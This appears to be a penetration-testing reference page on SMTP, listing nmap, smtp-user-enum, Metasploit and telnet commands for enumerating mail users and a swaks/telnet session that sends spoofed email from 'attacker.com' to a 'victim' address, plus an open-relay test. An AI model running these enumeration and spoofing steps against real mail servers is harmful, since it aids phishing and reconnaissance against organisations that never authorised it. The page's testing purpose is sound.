Skip to main content

SMTP - 25/465/587

The Simple Mail Transfer Protocol (SMTP) is a protocol used for sending and routing emails between mail servers over the internet. It works by transferring email messages from a client to a server or between servers, typically used in conjunction with other protocols like IMAP or POP3 for message retrieval.

  • Default port: 25
  • Other port: 465, 587

Enumeration

# Nmap SMTP Enumeration
nmap -sVC -p 25,143,110,465,587,993,995 10.10.10.10
# We can enumerate for all of the above ports for custom mail server implementations.
nmap -p 25,465,587 --script smtp-commands,smtp-enum-users,smtp-open-relay 10.10.10.10
# Scans for open SMTP ports, attempts to enumerate users, check for commands, and open relays

# smtp-user-enum
smtp-user-enum -M VRFY -U users.txt -t example.com
# Uses the VRFY command to enumerate valid users

smtp-user-enum -M EXPN -U users.txt -t example.com
# Uses the EXPN command to enumerate mailing lists (less commonly supported)

smtp-user-enum -M RCPT -U users.txt -T ip_list.txt
# Sends RCPT TO commands to check for valid users (most reliable method)

# Manual via Telnet
telnet example.com 25
HELO test.com
VRFY username
RCPT TO:<user@example.com>
# Manual method to check for valid SMTP users

# Metasploit SMTP Enumeration
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS example.com
set USER_FILE users.txt
run
# Automates SMTP user enumeration using known methods

Exploitation

# SWAKS - Swiss Army Knife for SMTP
swaks --to victim@example.com --from spoofed@attacker.com --server smtp.example.com --data message.txt
# Sends custom-crafted emails; useful for testing spam filters and relays

swaks --ehlo attacker.com --server smtp.example.com --protocol SMTP --auth
# Tests SMTP server’s EHLO response, supported commands, and auth options

# SMTP Open Relay Test
swaks --to someone@external.com --from anyone@internal.com --server smtp.example.com
# If server relays this message, it’s an open relay and vulnerable to abuse

# Manual Email Injection (if telnet is allowed)
telnet mail.example.com 25
HELO attacker.com
MAIL FROM:<spoofed@attacker.com>
RCPT TO:<victim@example.com>
DATA
Subject: Test
Test message
.
QUIT
# Manual test to send spoofed or internal-looking emails